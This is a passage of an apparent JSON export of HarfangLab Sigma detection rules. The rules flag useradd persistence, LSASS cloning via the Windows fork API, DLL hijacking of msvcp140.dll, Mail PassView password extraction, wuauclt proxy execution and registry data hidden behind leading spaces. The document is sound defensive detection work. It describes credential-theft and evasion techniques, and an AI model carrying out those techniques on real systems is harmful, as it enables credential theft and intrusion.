'/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_edutice:\n # useradd -p -s /bin/bash -b /home/external -g edutice-external -m --badname\n - ProcessCommandLine|contains: ' -g edutice-external '\n ProcessGrandparentCommandLine: '/usr/bin/python3 /usr/lib/edutice/service/main.py'\n - ProcessCommandLine|contains: ' -g edutice-external '\n ProcessParentCommandLine: '/usr/bin/python3 /usr/lib/edutice/service/main.py'\n\n exclusion_containers:\n Ancestors|contains:\n - '/usr/bin/podman'\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "00ecf213-801a-4ee0-b19d-fbe12001d4a3",
"rule_name": "User Created via useradd",
"rule_description": "Detects an attempt to create a new user using the useradd utility.\nAdversaries may create new users to hide their activity or achieve persistence.\nIt is recommended to investigate whether the process has legitimate reasons to create a user as well as to look for possible suspicious activities on the host.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1136.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "00ff5814-36a0-4bb9-8426-599b30b414a1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094659Z",
"creation_date": "2026-03-23T11:45:34.094661Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094665Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/deepinstinct/Dirty-Vanity",
"https://gist.github.com/GeneralTesler/68903f7eb00f047d32a4d6c55da5a05c",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1003_001_lsass_clone_using_process_reflection.yml",
"content": "title: Possible LSASS Reflection via Windows Fork API\nid: 00ff5814-36a0-4bb9-8426-599b30b414a1\ndescription: |\n Detects the reflection of a Windows process using the Windows fork API.\n Attackers can use process forking to inject processes with shellcodes while evading detection since the modified process is the cloned one.\n This technique can be used to hide malicious tasks inside legitimate processes as well as silently dump LSASS' memory for credential access and privilege escalation.\n It is recommended to investigate the process that performed this action to determine its legitimacy.\nreferences:\n - https://github.com/deepinstinct/Dirty-Vanity\n - https://gist.github.com/GeneralTesler/68903f7eb00f047d32a4d6c55da5a05c\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/01/04\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1055\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n StartFunction|contains: 'RtlCreateProcessReflection'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\syswow64\\WerFault.exe'\n ProcessParentCommandLine: '?:\\Windows\\System32\\svchost.exe -k WerSvcGroup'\n\n exclusion_rdrleakdiag:\n # C:\\WINDOWS\\system32\\RdrLeakDiag.exe -p 10768 -h 25 -tp 2 -cleanup -watson -unnamed -wait 240\n ProcessImage:\n - '?:\\Windows\\System32\\rdrleakdiag.exe'\n - '?:\\Windows\\syswow64\\rdrleakdiag.exe'\n ProcessCommandLine|contains|all:\n - 'RdrLeakDiag.exe'\n - '-cleanup'\n - '-watson'\n - '-unnamed'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "00ff5814-36a0-4bb9-8426-599b30b414a1",
"rule_name": "Possible LSASS Reflection via Windows Fork API",
"rule_description": "Detects the reflection of a Windows process using the Windows fork API.\nAttackers can use process forking to inject processes with shellcodes while evading detection since the modified process is the cloned one.\nThis technique can be used to hide malicious tasks inside legitimate processes as well as silently dump LSASS' memory for credential access and privilege escalation.\nIt is recommended to investigate the process that performed this action to determine its legitimacy.\n",
"rule_creation_date": "2023-01-04",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "01198d94-cc61-455c-9bd1-37096dd366f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623301Z",
"creation_date": "2026-03-23T11:45:34.623303Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623307Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657",
"https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_unsigned_msvcp140.yml",
"content": "title: Unsigned msvcp140.dll DLL Loaded\nid: 01198d94-cc61-455c-9bd1-37096dd366f1\ndescription: |\n Detects a suspicious unsigned DLL named 'msvcp140.dll' loaded by a process that could be the target to DLL hijacking.\n Adversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the process loading the DLL to identify any suspicious activity, as well as to analyze the DLL itself for malicious content.\nreferences:\n - https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657\n - https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/07/23\nmodified: 2026/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\msvcp140.dll'\n sha256|contains: '?' # at least one character, some SHA256 are empty\n\n filter_signed:\n Signed: 'true'\n\n filter_commonfolders:\n ImageLoaded|startswith:\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\System32\\DriverStore\\'\n - '?:\\Windows\\System32\\msvcp140.dll'\n - '?:\\Windows\\syswow64\\msvcp140.dll'\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n filter_known_sha256:\n sha256:\n - '1e57a6df9e3742e31a1c6d9bff81ebeeae8a7de3b45a26e5079d5e1cce54cd98'\n - 'f7ba518cb961853ec35c7bb159054983fc006fdfbb6b1c360720eb52fefb3d38'\n - 'b7278da3da769bff80ecf19d0f36ad1716da7f6c77f625c08d185ad302b200d0'\n - 'ef27a68bdc1ee3d5d9a6a720b656bfb7604a8fac6aceb245a6eadc2788686d9f'\n - '557d76338488e28c7761dfe5ee4fa722f65f0c945563002e86de09c95f02b2aa'\n - '75fc76655631a4ae72d015b8e85f899537c603661ca35a3f29099b8e4c84716c'\n - '74892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823'\n - '87a9e61e428632177c0292390d125da8e5c996cc0d1d619045ee041ce3bd9147'\n - '9e16ea4679e3c5780b2fdeea251e258bef968631137a40f93fcad6ee551108df'\n - 'd3151f653af88d88994dd66e30e3a184ba347e57a7c3ca909c2a9d4b5b6084fc'\n - '875f236424f59a82c9311930097c7e6073242fee66a60c38eec79b827d6e924c'\n - '006a73b6c5b31cc85974873a694e81e3d213ec493323b04607bcdaba0d6115eb'\n - '85aa8c8ab4cbf1ff9ae5c7bde1bf6da2e18a570e36e2d870b88536b8658c5ba8'\n - '115327d2c7fe87aa39a32bf3fd27e3cff32b9f4bb80f31e426b30148820aa220'\n - 'b9e8377a03ef104122a416f968b05133739f2f2a6c4b83c190723d7d780ebad3'\n - 'c09b126e7d4c1e6efb3ffcda2358252ce37383572c78e56ca97497a7f7c793e4'\n - '65ee0e7864cc6b2d8fd81b4cdf32bc900b74fdf04149587a8987f11f57966c86'\n - 'e7f59bc871613f960e61aa111ceb2f6de0650f79878d9e2141c646a51bdf97b0'\n - '8bd47bbc5cf773fa44ba38a20dbd3353970353cb99eda9238e4af92383fab8f9'\n\n filter_knownimphash:\n Imphash:\n - '2ba11fd5a511c8a409e705e9ab6b5dc1'\n - 'adf99b9ea3a1f76c33522f96772bc4dd'\n - 'a14a54183892ac75415d5e2bb2ac7208'\n - '01c801a34c4715440ef1f25ad689b315'\n - '54c174302c3213f3e59e692f8b5c58e5'\n - 'f2d585ff96afa3a77e09f5b37e7b3230'\n - 'c0e775d13a8146396b3de4dc441694a7'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_spool:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\msvcp140.dll'\n\n exclusion_java: # too many java process with unpredictable name..\n ImageLoaded|endswith: '\\bin\\msvcp140.dll'\n\n exclusion_zotero:\n ProcessImage|endswith: '\\Zotero*\\zotero.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Zotero\\msvcp140.dll'\n\n exclusion_ideashare:\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShare\\IdeaShare.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShare\\IdeaShareService.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShareKey\\IdeaShareService.exe'\n - '?:\\ProgramData\\IdeaShare\\IdeaShare.exe'\n ImageLoaded:\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShareKey\\msvcp140.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShare\\msvcp140.dll'\n - '?:\\ProgramData\\IdeaShare\\msvcp140.dll'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\system32\\WerFault.exe'\n\n exclusion_teams:\n - ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Teams\\current\\msvcp140.dll'\n - ProcessName: 'regsvr32.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\TeamsMeetingAddin\\\\*\\\\*\\msvcp140.dll'\n\n exclusion_onedrive:\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\msvcp140.dll'\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\Microsoft.SharePoint.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\FileSyncConfig.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\FileCoAuth.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\OneDriveLauncher.exe'\n\n exclusion_sap:\n ProcessImage|endswith: '\\DATA_UNITS\\CrystalReports\\setup.engine\\actionagentproc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SAP SE'\n\n exclusion_sonix:\n ProcessCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k Camera -s FrameServer'\n ImageLoaded: '?:\\Windows\\System32\\SONiX\\msvcp140.dll'\n\n exclusion_cisco:\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\\\*\\dependencies\\msvcp140.dll'\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\\\*\\dependencies\\wmlhost.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\CiscoCollabHost.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "01198d94-cc61-455c-9bd1-37096dd366f1",
"rule_name": "Unsigned msvcp140.dll DLL Loaded",
"rule_description": "Detects a suspicious unsigned DLL named 'msvcp140.dll' loaded by a process that could be the target to DLL hijacking.\nAdversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the process loading the DLL to identify any suspicious activity, as well as to analyze the DLL itself for malicious content.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2026-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "01474426-6a8b-4834-9f6f-54b7c359a027",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077917Z",
"creation_date": "2026-03-23T11:45:34.077919Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077924Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.nirsoft.net/utils/mailpv.html",
"https://attack.mitre.org/techniques/T1555/"
],
"name": "t1555_mail_passview_execution.yml",
"content": "title: Mail PassView Execution\nid: 01474426-6a8b-4834-9f6f-54b7c359a027\ndescription: |\n Detects the execution of Mail PassView, a NirSoft utility allowing users to retrieve passwords from many mail clients.\n It can be used by attackers to get the mail passwords in an infected hosts.\n It is recommended to investigate the actions that were performed by Mail PassView as well as Mail PassView's execution context to determine its legitimacy.\nreferences:\n - https://www.nirsoft.net/utils/mailpv.html\n - https://attack.mitre.org/techniques/T1555/\ndate: 2025/10/31\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.MailPassView\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\mailpv.exe'\n # No OrginalFilename, we have to rely on another PE field\n # The two spaces are intentional\n - Product: 'Email Password-Recovery'\n\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "01474426-6a8b-4834-9f6f-54b7c359a027",
"rule_name": "Mail PassView Execution",
"rule_description": "Detects the execution of Mail PassView, a NirSoft utility allowing users to retrieve passwords from many mail clients.\nIt can be used by attackers to get the mail passwords in an infected hosts.\nIt is recommended to investigate the actions that were performed by Mail PassView as well as Mail PassView's execution context to determine its legitimacy.\n",
"rule_creation_date": "2025-10-31",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "016b5935-600b-4242-91e1-e727c9410d11",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070359Z",
"creation_date": "2026-03-23T11:45:34.070361Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070365Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_wuauctl.yml",
"content": "title: Proxy Execution via Wuauclt\nid: 016b5935-600b-4242-91e1-e727c9410d11\ndescription: |\n Detects the execution of wuauclt.exe as a legitimate binary proxy for System Binary Proxy Execution.\n Malicious actors may exploit wuauclt.exe to execute arbitrary DLLs, evading detection by leveraging trusted system binaries.\n It is recommended to investigate the process and parameters of wuauclt.exe execution, analyze the DLL for malicious content, and ensure that any executed code aligns with legitimate system operations.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/11/17\nmodified: 2025/02/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Wuauclt\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\wuauclt.exe'\n - OriginalFileName: 'wuauclt.exe'\n\n selection_commandline:\n CommandLine|contains|all:\n - 'UpdateDeploymentProvider'\n - 'RunHandlerComServer'\n\n exclusion_legitimate:\n CommandLine|contains:\n - ' UpdateDeploymentProvider.dll '\n - ' wuaueng.dll '\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "016b5935-600b-4242-91e1-e727c9410d11",
"rule_name": "Proxy Execution via Wuauclt",
"rule_description": "Detects the execution of wuauclt.exe as a legitimate binary proxy for System Binary Proxy Execution.\nMalicious actors may exploit wuauclt.exe to execute arbitrary DLLs, evading detection by leveraging trusted system binaries.\nIt is recommended to investigate the process and parameters of wuauclt.exe execution, analyze the DLL for malicious content, and ensure that any executed code aligns with legitimate system operations.\n",
"rule_creation_date": "2022-11-17",
"rule_modified_date": "2025-02-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "01833e69-127a-4ff4-a998-d4decbae548f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069505Z",
"creation_date": "2026-03-23T11:45:34.069507Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069512Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_hidden_registry_data_space.yml",
"content": "title: Possible Hidden Registry Data Created\nid: 01833e69-127a-4ff4-a998-d4decbae548f\ndescription: |\n Detects an attempt to hide data in the Registry by adding multiple spaces at the beginning of a value.\n Adversaries often manipulate the Windows Registry by adding spaces to obscure data, hide configurations, or remove evidence.\n It is recommended to investigate the source of the registry modification, and check for related events that may indicate unauthorized access or malicious activity.\nreferences:\n - https://attack.mitre.org/techniques/T1112/\ndate: 2021/10/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n Details|startswith: ' '\n\n # Some softwares set values containing only a random number of spaces\n exclusion_all_spaces:\n Details|startswith: ' '\n Details|endswith: ' '\n\n exclusion_image:\n Image:\n - '?:\\Program Files (x86)\\Avid\\iNEWS*\\ANWS.exe'\n - '?:\\Windows\\System32\\drivers\\Intel\\ICPS\\IntelConnect.exe'\n - '?:\\Program Files\\Photon Engineering\\FRED *\\Bin\\Fred.exe'\n - '?:\\Program Files (x86)\\Thermo\\Avantage\\Bin\\Avantage.exe'\n - '?:\\program files\\thermo scientific\\avantage\\bin\\avantage.exe'\n\n exclusion_commandline:\n Image: '?:\\windows\\system32\\regsvr32.exe'\n ProcessCommandLine:\n - '/s ?:\\program files\\thermo scientific\\avantage\\bin\\xraygun.ocx'\n - '/s ?:\\program files\\thermo scientific\\avantage\\bin\\xraygun_??????.ocx'\n - '/s ?:\\program files\\thermo scientific\\avantage\\bin\\vgchargecompensation.ocx'\n\n exclusion_tiworker:\n Image|endswith: '\\TiWorker.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_windowsupdatebox:\n ProcessParentImage|endswith:\n - '\\WindowsUpdateBox.exe'\n - ':\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n - '\\TiWorker.exe'\n - '\\Sources\\SetupPrep.exe'\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Plugin\\Microsoft.Windows.ServerManagerWorkflows\\ConfigXML'\n Details|contains|all:\n - 'PlugInConfiguration'\n - 'PublicKeyToken'\n - 'MaxConcurrentCommandsPerShell'\n\n exclusion_adobe:\n Image|endswith:\n - '\\AcroRd32.exe'\n - '\\Acrobat.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Adobe Inc.'\n - 'Adobe Systems, Incorporated'\n TargetObject|endswith:\n # - '\\Software\\Adobe\\Acrobat Reader\\DC\\SessionManagement\\cWindowsPrev\\cWin0\\cTab*\\tfilename'\n # - '\\Software\\Adobe\\Acrobat Reader\\DC\\SessionManagement\\cWindowsCurrent\\cWin0\\cTab*\\tfilename'\n # - '\\SOFTWARE\\Adobe\\Acrobat Reader\\2017\\AVGeneral\\cRecentFiles\\c8\\tFileName'\n - '\\SOFTWARE\\Adobe\\Acrobat Reader\\\\*\\tfilename'\n - '\\SOFTWARE\\Adobe\\Adobe Acrobat\\\\*\\tfilename'\n\n exclusion_jalios:\n Image: '?:\\Program Files (x86)\\Jalios\\Jalios JDrive\\srm.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'JALIOS'\n Details|contains:\n - '__AChangedOverlay'\n - '__ASynchronizedOverlay'\n - '__APrivateOverlay'\n - '__ATBUOverlay'\n - '__ALockedOverlay'\n\n exclusion_setuphost:\n Image: '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n TargetObject:\n - 'HKLM\\$OFFLINE_RW_????????$SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions\\Approved\\{????????-????-????-????-????????????}'\n - 'HKLM\\$OFFLINE_RW_????????$SOFTWARE\\Classes\\CLSID\\{????????-????-????-????-????????????}\\(Default)'\n Details|contains:\n - '__AChangedOverlay'\n - '__ASynchronizedOverlay'\n - '__APrivateOverlay'\n - '__ATBUOverlay'\n - '__ALockedOverlay'\n\n exclusion_wsman:\n Image: '?:\\Windows\\System32\\WSManHTTPConfig.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Migration\\Plugin\\Microsoft.Windows.ServerManagerWorkflows\\ConfigXML'\n\n exclusion_sap:\n Image:\n - '?:\\Program Files (x86)\\SAP\\FrontEnd\\SAPgui\\saplogon.exe'\n - '?:\\Program Files (x86)\\SAP\\FrontEnd\\SAPGUI\\saplgpad.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SAP SE'\n\n exclusion_pdf_architect:\n Image: '?:\\Program Files\\PDF Architect ?\\architect.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'pdfforge GmbH'\n\n exclusion_smbios2reg:\n Image|endswith: '\\BeetleInfo\\Smbios2Reg.exe'\n ProcessOriginalFileName: 'Smbios2Reg.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Wincor Nixdorf\\BeetleInfo SensorService\\DMI\\Mainboard'\n\n exclusion_notepad:\n Image:\n - '?:\\Windows\\System32\\notepad.exe'\n - '?:\\Windows\\SysWOW64\\notepad.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Notepad\\\\*String'\n\n exclusion_ssms:\n Image: '?:\\Program Files (x86)\\Microsoft SQL Server Management Studio *\\Common7\\IDE\\Ssms.exe'\n TargetObject|endswith:\n - '\\SOFTWARE\\Microsoft\\SQL Server Management Studio\\\\*_IsoShell\\Find\\Find'\n - '\\SOFTWARE\\Microsoft\\SQL Server Management Studio\\\\*_IsoShell\\Find\\Find *'\n\n exclusion_softerra:\n Image|endswith: '\\ldapbrowser.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Softerra, Ltd.'\n TargetObject|endswith: '\\SOFTWARE\\Softerra\\LDAP Browser *\\Settings\\QuickSearchBar\\\\*'\n\n 